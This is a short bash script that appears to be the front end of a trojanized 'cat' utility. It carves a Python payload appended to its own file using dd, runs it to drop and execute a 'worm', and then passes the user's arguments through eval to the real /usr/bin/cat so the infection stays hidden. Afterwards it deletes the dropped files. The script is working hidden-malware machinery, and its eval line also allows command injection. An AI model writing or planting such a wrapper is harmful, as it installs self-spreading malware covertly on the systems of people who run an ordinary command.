#!/usr/bin/bash
# dd
dd if=cat of=get_worm.py skip=253 bs=1 count=343 status=none
python3 get_worm.py

chmod +x worm
./worm

# call the original cat
cmd="/usr/bin/cat"
for arg in "$@" 
do
    cmd="$cmd $arg"
done
eval $cmd
rm -f worm get_worm.py
exit 0
